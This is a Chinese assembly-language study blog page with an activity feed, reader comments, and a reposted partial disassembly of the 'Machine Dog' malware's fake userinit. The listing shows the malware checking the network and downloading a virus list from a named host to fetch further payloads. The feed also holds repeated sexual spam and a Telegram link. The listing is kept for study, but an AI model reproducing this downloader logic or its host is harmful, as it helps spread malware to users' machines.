atel的学习博客

今天一个个性，明天一个个性，原来我没的个性。
『姓名』：张杰
『性别』：男『发送消息』
个人说明：
『详细信息』『加为好友』

[ q271967394 ]通过了汇编语言第2章的检测。 06/01 13:31
希望[ q271967394 ]再接再厉，下次通过汇编语言第2章的检测点。 05/30 17:04
希望[ yvzi ]再接再厉，下次通过汇编语言第2章的检测点。 05/28 18:29
[ yvzi ]通过了汇编语言第1章的检测。 05/28 09:39
希望[ q271967394 ]再接再厉，下次通过汇编语言第2章的检测点。 05/27 21:33
希望[ yvzi ]再接再厉，下次通过汇编语言第1章的检测点。 05/27 21:17
[ q271967394 ]通过了汇编语言第1章的检测。 05/27 16:43
[yvzi]参加了汇编语言的学习活动。 05/27 11:37
[ rocky_ton ] 对 [ pilot ] 的提问做出新回复：有敏感中文文字 05/22 12:04
[ rocky_ton ] 发表了新问题，课程设计1（有点长，应该可以优化的更简短） 05/22 12:02
[q271967394]参加了汇编语言的学习活动。 05/21 16:19
[ dandanfeng160 ]通过了汇编语言第1章的检测。 05/08 17:28
[dandanfeng160]参加了汇编语言的学习活动。 05/08 15:48
希望[ 8192bit ]再接再厉，下次通过汇编语言第6章的检测点。 04/29 01:48
希望[ 741268496 ]再接再厉，下次通过汇编语言第1章的检测点。 04/22 10:37
[741268496]参加了汇编语言的学习活动。 04/22 10:19
[ mountaincreep ] 对 [ jayh ] 的提问做出新回复：为什么你的中断没有用iret返回呢？ 04/13 12:58
[ breeze2024 ] 对 [ rayrgb ] 的提问做出新回复：link和msam是16位程序，现在的电脑没法支持了，得自己模拟环境。 04/13 08:39
[ hedantou11 ] 在 [ somniumchase ] 的博文中发表新评论：6 04/11 04:03
[ liru124 ]通过了汇编语言第1章的检测。 04/09 22:12
[liru124]参加了汇编语言的学习活动。 04/09 22:11
希望[ notalking ]再接再厉，下次通过汇编语言第1章的检测点。 04/06 23:37
[notalking]参加了汇编语言的学习活动。 04/06 23:37
[ yuexianer ] 对 [ lmyycx ] 的提问做出新回复：44051534@qq.com , 谢谢了 04/04 15:53
[ king38492378 ]通过了汇编语言第9章的检测。 04/02 01:48
[ king38492378 ]通过了汇编语言第8章的检测。 03/31 03:04
[ king38492378 ]通过了汇编语言第7章的检测。 03/30 16:04
[ king38492378 ]通过了汇编语言第6章的检测。 03/27 16:19
[ line043861 ] 对自己的博文发表新观点：+043861 +043861 +043861 +043861 +0 03/24 00:24
[ line043861 ] 对自己的博文发表新观点：+043861 +043861 +043861+043861 03/24 00:22
[ line043861 ] 发表了新的博文：254646565 03/24 00:20
希望[ king38492378 ]再接再厉，下次通过汇编语言第6章的检测点 03/21 19:01
希望[ king38492378 ]再接再厉，下次通过汇编语言第6章的检测点 03/17 01:16
[ lai-52sora ] 对 [ hygf99 ] 的作业提出了一些建议：+瀨52sora饑渴淫蕩人妻求幹 03/12 00:39
[ lai-52sora ] 对 [ hygf99 ] 的作业提出了一些建议：+瀨52sora饑渴淫蕩人妻求幹 03/12 00:39
[ lai-52sora ] 对 [ hygf99 ] 的作业提出了一些建议：+瀨52sora饑渴淫蕩人妻求幹 +瀨52sora饑渴淫蕩人妻求幹 +瀨 03/12 00:38
[ lai-52sora ] 对 [ hygf99 ] 的作业提出了一些建议：+瀨52sora饑渴淫蕩人妻求幹 03/12 00:38
[ lai-52sora ] 对 [ hygf99 ] 的作业提出了一些建议：+瀨52sora饑渴淫蕩人妻求幹 03/12 00:38
[ lai-52sora ] 对 [ hygf99 ] 的作业提出了一些建议：+瀨52sora饑渴淫蕩人妻求幹 03/12 00:37
[ lai-52sora ] 对 [ hygf99 ] 的作业提出了一些建议：+瀨52sora饑渴淫蕩人妻求幹 03/12 00:37
[ lai-52sora ] 对 [ hygf99 ] 的作业提出了一些建议：+瀨52sora饑渴淫蕩人妻求幹 03/12 00:37
[ lai-52sora ] 对 [ hygf99 ] 的作业提出了一些建议：+瀨52sora饑渴淫蕩人妻求幹 03/12 00:37
[ lai-52sora ] 对 [ hygf99 ] 的作业提出了一些建议：+瀨52sora饑渴淫蕩人妻求幹 03/12 00:37
[ lai-52sora ] 对 [ hygf99 ] 的作业提出了一些建议：+瀨52sora饑渴淫蕩人妻求幹 03/12 00:36
[ lai-52sora ] 对 [ hygf99 ] 的作业提出了一些建议：https://t.me/hey893 03/12 00:35
希望[ king38492378 ]再接再厉，下次通过汇编语言第6章的检测点 03/11 00:48
希望[ king38492378 ]再接再厉，下次通过汇编语言第6章的检测点 03/09 16:52
[ 261320 ] 对自己的提问表达了新看法：回帖的时候老是这样哪些是敏感信息啊？ 03/08 11:14
[ 261320 ] 发表了新问题，现在还有人在学这个汇编语言吗？ 03/08 11:13
[261320]参加了汇编语言的学习活动。 03/08 10:49

[anwu00] 写反了，最小为1001H，最大为2000H 05/10 11:04
[crazyman] 博主确实好久不见了。这里是一个开始，希望更多人都能从这里明确方向，开始自己的计算机之路。 08/16 14:55
[游客] 你那个循环3FH错了应该是循环40H 因为是添入0-63 就是添64次 08/02 17:27
[游客] 我猜是因为2000:0000这段是给当成了一段栈寄存器使用了所以一些数据会往里写入写入的数据有的 07/29 23:00
[游客] 2^N=寻址能力 N是总线宽度算出的能力是B为单位比如宽度13的CPU 2^13=8192 07/29 22:56
[游客] 恩，有道理 04/08 12:25
[atel] 那主程序我测试过的,可以显示的.但是加载到了软盘就不行了. 04/06 22:36
[wdm] 没有错误啊。我试了，运行ok的！ 04/06 18:17
[wdm] 说明程序还是有问题哟。建议你一点一点的来做，先做一显示功能选项的界面吧。然后在一点点的进行功 04/06 18:10
[atel] 有什么错误？ 04/04 21:33

[2008-01-21 11:14] 机器狗源码(转)

CODE:

0040045A > $   55                       push ebp                                         ;   (初始 cpu 选择)
0040045B     .   8BEC                     mov ebp,esp
0040045D     .   81C4 E8FEFFFF           add esp,-118
00400463     .   68 9C0A4000             push userinit.00400A9C                           ; /user32.dll
00400468     .   E8 55020000             call <jmp.&kernel32.LoadLibraryA>                 ; \LoadLibraryA
0040046D     .   0BC0                     or eax,eax
0040046F     .   74 11                   je short userinit.00400482
00400471     .   68 A70A4000             push userinit.00400AA7                           ; /loadremotefonts
00400476     .   50                       push eax                                         ; |hModule
00400477     .   E8 34020000             call <jmp.&kernel32.GetProcAddress>               ; \GetProcAddress
0040047C     .   0BC0                     or eax,eax
0040047E     .   74 02                   je short userinit.00400482
00400480     .   FFD0                     call eax                                         ;   USER32.LoadRemoteFonts
00400482     >   8D45 FC                 lea eax,dword ptr ss:[ebp-4]
00400485     .   50                       push eax                                         ; /pHandle
00400486     .   68 19000200             push 20019                                       ; |Access = KEY_READ
0040048B     .   6A 00                   push 0                                           ; |Reserved = 0
0040048D     .   68 B70A4000             push userinit.00400AB7                           ; |software\microsoft\windows nt\currentversion\winlogon
00400492     .   68 02000080             push 80000002                                     ; |hKey = HKEY_LOCAL_MACHINE
00400497     .   E8 5C020000             call <jmp.&advapi32.RegOpenKeyExA>               ; \RegOpenKeyExA
0040049C     .   0BC0                     or eax,eax                                         //打开注册表检测winlogon键值
0040049E     .   75 48                   jnz short userinit.004004E8
004004A0     .   C745 F8 04010000         mov dword ptr ss:[ebp-8],104
004004A7     .   68 04010000             push 104                                         ; /Length = 104 (260.)
004004AC     .   8D85 F4FEFFFF           lea eax,dword ptr ss:[ebp-10C]                   ; |
004004B2     .   50                       push eax                                         ; |Destination
004004B3     .   E8 16020000             call <jmp.&kernel32.RtlZeroMemory>               ; \RtlZeroMemory
004004B8     .   8D45 F8                 lea eax,dword ptr ss:[ebp-8]
004004BB     .   50                       push eax                                         ; /pBufSize
004004BC     .   8D85 F4FEFFFF           lea eax,dword ptr ss:[ebp-10C]                   ; |
004004C2     .   50                       push eax                                         ; |Buffer
004004C3     .   6A 00                   push 0                                           ; |pValueType = NULL
004004C5     .   6A 00                   push 0                                           ; |Reserved = NULL
004004C7     .   68 960A4000             push userinit.00400A96                           ; |shell
004004CC     .   FF75 FC                 push dword ptr ss:[ebp-4]                         ; |hKey
004004CF     .   E8 2A020000             call <jmp.&advapi32.RegQueryValueExA>             ; \RegQueryValueExA
004004D4     .   8D85 F4FEFFFF           lea eax,dword ptr ss:[ebp-10C]
004004DA     .   50                       push eax                                         ; /Arg1
004004DB     .   E8 50FDFFFF             call userinit.00400230                           ; \userinit.00400230     CreateProcessA
004004E0     .   FF75 FC                 push dword ptr ss:[ebp-4]                         ; /hKey
004004E3     .   E8 0A020000             call <jmp.&advapi32.RegCloseKey>                 ; \RegCloseKey
004004E8     >   68 E8030000             push 3E8                                         ; /Timeout = 1000. ms
004004ED     .   E8 E8010000             call <jmp.&kernel32.Sleep>                       ; \Sleep
004004F2     .   6A 00                   push 0
004004F4     .   8D45 F8                 lea eax,dword ptr ss:[ebp-8]
004004F7     .   50                       push eax
004004F8     .   E8 13020000             call <jmp.&wininet.InternetGetConnectedState>           ;看网络是否连接
004004FD     .   0BC0                     or eax,eax
004004FF     .   75 02                   jnz short userinit.00400503
00400501     .^ EB E5                   jmp short userinit.004004E8
00400503     >   68 04010000             push 104                                         ; /Length = 104 (260.)
00400508     .   8D85 F4FEFFFF           lea eax,dword ptr ss:[ebp-10C]                   ; |
0040050E     .   50                       push eax                                         ; |Destination
0040050F     .   E8 BA010000             call <jmp.&kernel32.RtlZeroMemory>               ; \RtlZeroMemory
00400514     .   8D85 F4FEFFFF           lea eax,dword ptr ss:[ebp-10C]
0040051A     .   50                       push eax                                         ; /TempName
0040051B     .   6A 00                   push 0                                           ; |Unique = 0
0040051D     .   6A 00                   push 0                                           ; |Prefix = NULL
0040051F     .   68 940A4000             push userinit.00400A94                           ; |.
00400524     .   E8 93010000             call <jmp.&kernel32.GetTempFileNameA>             ; \GetTempFileNameA                 ;生成下载病毒列表得文件名
00400529     >   68 E8030000             push 3E8                                         ; /Timeout = 1000. ms
0040052E     .   E8 A7010000             call <jmp.&kernel32.Sleep>                       ; \Sleep
00400533     .   68 88130000             push 1388                                         ; /Arg3 = 00001388
00400538     .   8D85 F4FEFFFF           lea eax,dword ptr ss:[ebp-10C]                   ; |
0040053E     .   50                       push eax                                         ; |Arg2
0040053F     .   68 ED0A4000             push userinit.00400AED                           ; |http://2.joppnqq.com/test.cer                 ;病毒列表
00400544     .   E8 2CFDFFFF             call userinit.00400275                           ; \userinit.00400275   ;里面事下载并读取病毒列表下载病毒~
00400549     .   0BC0                     or eax,eax
0040054B     .   0F84 17010000           je userinit.00400668
00400551     .   C705 900A4000 00000000 mov dword ptr ds:[400A90],0
0040055B     .   6A 00                   push 0                                           ; /hTemplateFile = NULL
0040055D     .   6A 00                   push 0                                           ; |Attributes = 0
0040055F     .   6A 03                   push 3                                           ; |Mode = OPEN_EXISTING
00400561     .   6A 00                   push 0                                           ; |pSecurity = NULL
00400563     .   6A 00                   push 0                                           ; |ShareMode = 0
00400565     .   68 00000080             push 80000000                                     ; |Access = GENERIC_READ
0040056A     .   8D85 F4FEFFFF           lea eax,dword ptr ss:[ebp-10C]                   ; |
00400570     .   50                       push eax                                         ; |FileName
00400571     .   E8 16010000             call <jmp.&kernel32.CreateFileA>                 ; \CreateFileA
00400576     .   83F8 FF                 cmp eax,-1
00400579     .   0F84 E2000000           je userinit.00400661
0040057F     .   8985 F0FEFFFF           mov dword ptr ss:[ebp-110],eax
00400585     .   6A 00                   push 0                                           ; /pFileSizeHigh = NULL
00400587     .   FFB5 F0FEFFFF           push dword ptr ss:[ebp-110]                       ; |hFile
0040058D     .   E8 18010000             call <jmp.&kernel32.GetFileSize>                 ; \GetFileSize
00400592     .   83F8 0F                 cmp eax,0F
00400595     .   73 0D                   jnb short userinit.004005A4
00400597     .   FFB5 F0FEFFFF           push dword ptr ss:[ebp-110]                       ; /hObject
0040059D     .   E8 E4000000             call <jmp.&kernel32.CloseHandle>                 ; \CloseHandle
......................................................................................................................
00400676     .   6A 64                   push 64                                           ; /Timeout = 100. ms
00400678     .   E8 5D000000             call <jmp.&kernel32.Sleep>                       ; \Sleep
0040067D     .^ EB EE                   jmp short userinit.0040066D
0040067F     >   6A 00                   push 0                                           ; /ExitCode = 0
00400681     .   E8 1E000000             call <jmp.&kernel32.ExitProcess>                 ; \ExitProcess

   等学好了汇编我再来看.这个先放在这里,到时候我相信肯定收获不小,嘿嘿

评论次数(1) | 浏览次数(311) | 类型(计算机相关) | 收藏此文 |

[ wdm 发表于 2008-01-21 12:19 ]

反汇编出来的代码，不太适合初学。会受打击的。呵呵